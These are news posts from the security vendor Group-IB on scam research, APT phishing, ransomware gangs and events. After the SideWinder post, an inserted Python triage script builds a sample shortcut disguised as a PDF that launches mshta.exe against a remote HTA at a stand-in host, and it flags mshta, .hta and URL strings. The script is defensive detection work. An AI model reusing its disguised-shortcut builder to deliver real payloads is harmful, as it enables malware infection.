Group-IB
Your daily source of cybersecurity news brought to you by Group-IB, one of the global industry leaders.
#DigitalRiskSummit2022 #digitalriskprotection #cybersecurity

During the Digital Risk Summit 2022, Antony Dolgalev, Deputy Head of Digital Risk Protection, presented the findings of Group-IB's research into various scam schemes.

Here are some highlights:

▪️Accounting for 57% of all financially motivated cybercrime, the scam industry is becoming more structured and involves an ever-growing number of parties divided into hierarchical groups;

▪️Social media are increasingly the first point of contact between scammers and their potential victims;

▪️The number of brand-impersonating scam resources created per month has also increased. In the Middle East, Asia Pacific, and Europe, Group-IB analysts noted increases of 150%, 83%, and 89%, respectively.

More details 👈
#Webinar #Ransomware #DFIR

Ransomware-as-a-Service never ceases to impress, and this year it is expanding not only in quantity. To stand a chance against threat actors in 2022, it is vital to understand not only their latest tactics, techniques, and procedures but also what actions to take to protect against them. Join Group-IB's webinar on June 9, where Oleg Skulkin, Head of Digital Forensics and Incident Response, will share insights into today's ransomware threat landscape, along with detection strategies and threat hunting tips.

Register now👈
#APT #ThreatIntelligence #SideWinder

Group-IB Threat Intelligence researchers have discovered new malicious infrastructure and a custom tool of the APT group SideWinder (aka Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17). This threat actor is believed to originate from India and to primarily target Pakistan. The newly discovered custom tool, codenamed SideWinder.AntiBot.Script, is being used in the gang's phishing attacks against Pakistani targets.

▪️Over the last year, Group-IB's Threat Intelligence system identified 92 IP addresses used by SideWinder APT for phishing emails;

▪️Pakistan remains SideWinder's primary target. Based on the discovered phishing document and public research, the attackers are especially interested in Pakistani government organizations;

▪️The gang's primary attack vectors are phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan;

▪️SideWinder has started using an anti-bot script to filter its victims: the group is only interested in Pakistani users;

▪️The group continues to distribute malicious files in ZIP archives containing an LNK file, which downloads an HTA file from a remote server;

▪️Upon discovery, the Group-IB Threat Intelligence team notified the relevant local authorities and shared its findings so that the threat can be identified and contained at an early stage.

Want to know more? Check out our new blog post👈
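The ZIP → LNK → HTA delivery chain described in the post is a good candidate for attachment triage, because the shortcut's command line is stored in the clear in the .lnk file. The following is an added example, not Group-IB code or the SideWinder tooling: it builds a constructed sample archive (a shortcut whose target is mshta.exe and whose arguments point at a remote .hta), parses the shortcut's header and StringData section according to the MS-SHLLINK layout, and flags the indicators a mail gateway or analyst would look for. The archive contents, file names and the URL `https://example.invalid/update/notice.hta` are made up for the demonstration.

```python
"""Triage ZIP attachments for Windows shortcut (.lnk) droppers.

Added example (not Group-IB code). The sample archive below is constructed
for the demonstration; every name and URL in it is made up.
"""
import io
import struct
import zipfile

# ShellLinkHeader constants from MS-SHLLINK: size 0x4C and the fixed LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk (little-endian) form.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that control which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal shell link carrying only RELATIVE_PATH and ARGUMENTS."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
    header += struct.pack("<II", flags, 0)           # LinkFlags, FileAttributes
    header += b"\x00" * 24                           # Creation/Access/Write FILETIMEs
    header += struct.pack("<IIIH", 0, 0, 1, 0)       # FileSize, IconIndex, ShowCommand, HotKey
    header += b"\x00" * 10                           # Reserved1, Reserved2, Reserved3
    assert len(header) == LNK_HEADER_SIZE

    def string_data(s: str) -> bytes:
        # CountCharacters (not bytes) followed by the UTF-16LE string, no terminator.
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link, skipping IDList and LinkInfo."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:              # IDListSize excludes its own 2 bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                        # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, name in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le", errors="replace")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


def lnk_indicators(fields: dict) -> list:
    """Flag the mshta / remote-HTA pattern in a shortcut's target and arguments."""
    text = " ".join(fields.values()).lower()
    hits = []
    if "mshta" in text:
        hits.append("invokes mshta.exe")
    if ".hta" in text:
        hits.append("references an .hta file")
    if "http://" in text or "https://" in text:
        hits.append("remote URL in shortcut arguments/target")
    return hits


def scan_zip(zip_bytes: bytes) -> dict:
    """Return {member_name: [indicators]} for every .lnk member of the archive."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                findings[info.filename] = lnk_indicators(parse_lnk(zf.read(info)))
            except ValueError as exc:
                findings[info.filename] = [str(exc)]
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a shortcut that runs mshta.exe against a made-up remote HTA URL."""
    lnk = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                    "https://example.invalid/update/notice.hta")   # made-up URL
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Notification.pdf.lnk", lnk)    # Explorer hides .lnk, so this shows as a PDF
        zf.writestr("readme.txt", "benign text file")
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_zip(build_sample_zip()).items():
        print(member, "->", hits or ["no indicators"])
```

Two caveats for anyone adapting this: the parser reads only the StringData fields, while real shortcuts usually carry the target in the LinkTargetIDList and LinkInfo structures that the code skips over rather than resolves, so pair it with a full LNK parser before trusting a clean result; and string matching on `mshta`/`.hta`/`http` is an initial filter, not a verdict, since the command line can be obfuscated or can hand off to another LOLBin.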
#phishing #CERT

Group-IB has discovered an unprecedented phishing attack in Vietnam. The campaign impersonates 27 popular Vietnamese financial institutions and was still active at the time of writing.

The cybercriminals harvest highly detailed personal information from the clients of those institutions, up to and including draining their bank accounts. The fraudsters use techniques that allow them to bypass OTP verification.

Thanks to Group-IB's Graph Network Analysis tool, CERT-GIB was able to identify 240 interconnected domains that are part of the phishing campaign's infrastructure. Upon detecting this activity, CERT-GIB immediately notified Vietnam's national computer emergency response team, VNCERT. All 240 domains have been blocked following the efforts of CERT-GIB and local authorities. Yet new domains regularly appear.

Check out our new blog post to learn more👈
#cybersecurity #ACDF

🤝The Africa Cyber Defense Forum (ACDF), a continental platform for public-private cooperation, announced Group-IB, one of the global cybersecurity leaders, headquartered in Singapore, and afriVAD among the sponsors of the 2022 edition of the forum.

"We are proud to be involved in the 2022 edition of the Africa Cyber Defense Forum," says Ashraf Koheil, Group-IB's Director of Business Development in the Middle East, Africa, and Turkey. "Such events foster innovation and unlock opportunities for public-private cooperation in the cyber domain. Africa has been an important focus for Group-IB from the research and business perspectives. The expanding coverage of our global threat hunting ecosystem now allows us to pursue our mission of disrupting cybercrime in the region."

More details👈
#interview

On the sidelines of The Future of Data Centers Summit, Ashraf Koheil, Regional Director, Middle East, North Africa and Turkey at Group-IB, gave an interview to the news portal Ahram Online. He shared his opinion on digital transformation in Egypt and discussed the main cybersecurity threats to the Egyptian banking sector. Read the interview👈
#cybersecurity #VSS2022 #Vietnam

Save the date: Group-IB will take part in Vietnam Security Summit on Thursday, June 23 at JW Marriott Hotel Hanoi.

Catch Anh Le Duc’s speaking session on the topic of managing Attack Surfaces of Internet-facing assets & systems.

Do visit our booth as well and speak to our friendly representatives.

Hope to see you there!

More details: https://bit.ly/3y5xHYl
#cybersecurity #Seoul

Join Group-IB this Thursday, June 23 at the Next-Generation Security Vision 2022 Seminar & Exhibition!

Don’t forget to catch Hyun Suk Seo, our Business Development Manager in South Korea, as he speaks about Cyber Threat Intelligence and its integration with Attack Surface Management at 1:40 pm. Make sure to drop by our booth and get a chance to win exclusive merch when you leave your name card with us.

See you soon!
#ransomware #research #Conti

Group-IB presents its new report on Conti, one of the most dangerous ransomware gangs. You may have heard about them from the news: a state of emergency was declared in Costa Rica due to a ransomware attack. On April 18, cybercriminals attacked the servers of several ministries. The hackers exfiltrated more than a terabyte of databases, correspondence, and internal documents. When the government refused to pay a ransom of $10 million, the ransomware operators doubled it to $20 million. In their message, the hackers said that the attack on Costa Rica was just a test and hinted that far worse attacks were yet to come.

Conti is considered one of the most successful ransomware groups. Group-IB's latest report "CONTI ARMADA: THE ARMATTACK CAMPAIGN" shares data and detailed information about the tactics, techniques, and tools that Conti currently uses. Click here to download it👈
#ransomware #research #Conti

Here are some highlights from Group-IB's new report "CONTI ARMADA: THE ARMATTACK CAMPAIGN":

▪️The total number of the group’s victims between 2020 (when Conti started its activity) and March 2021 is 813.

▪️The geography of attacks carried out by Conti is vast and does not include Russia. Most attacks target the United States, Canada, the United Kingdom, Germany, France, and Italy.

▪️According to the Group-IB Threat Intelligence team, the group's fastest attack took exactly three days from the moment Conti penetrated the system to encryption.

▪️Group-IB analyzed Conti's "working hours" for the first time. On average, Conti "works" 14 hours a day, without weekends or holidays (except for the "New Year holidays"). The group starts work close to noon (GMT+3), and its activity declines only after 9:00 PM.

▪️Just like a legitimate IT business, Conti has its own HR, R&D, OSINT, and even customer support departments.

Click here to download the report 👈
#ransomware #BlackCat #ALPHV

Despite numerous arrests of people involved in ransomware activity, as well as the shutdown of some affiliate programs, ransomware remains the No. 1 threat.

There is no doubt in the security community that the former members of DarkSide, BlackMatter, and REvil have formed the core of ALPHV, a more mature (due to their experience) and sophisticated affiliate program. Security researchers unofficially call it BlackCat for its use of two logos: a black cat and a knife dripping with blood. ALPHV members later attempted to move away from romanticizing crime by changing the design of their logo, but the name BlackCat has stuck.

Despite its short history, the group has conducted about 140 attacks worldwide over the course of six months and has set a new direction for the development of extortion-related crime. Many affiliate programs, such as Hive, have started to mimic and adopt BlackCat's methods and approaches.

More details 👈
#UnifiedRiskPlatform

It’s no secret that the cyber threat landscape has intensified. The pace of cybercrime is accelerating, making it harder and harder for businesses to manage their cyber risks. Security teams are faced with the increasing challenge of identifying the specific threats they face, how to defend against them, and how to respond immediately in case of an incident.

To address these new challenges, Group-IB has developed the Unified Risk Platform, a comprehensive set of solutions that understands each organization’s threat profile and optimizes defenses against them in real time.

At the heart of the Unified Risk Platform is Group-IB's Single Data Lake, which contains the industry's largest and richest body of adversary intelligence. Every product and service in Group-IB's consolidated security suite is enriched with intelligence from the data lake, enabling them to counter the attacks targeting an organization and reduce organizational risk.

More details👈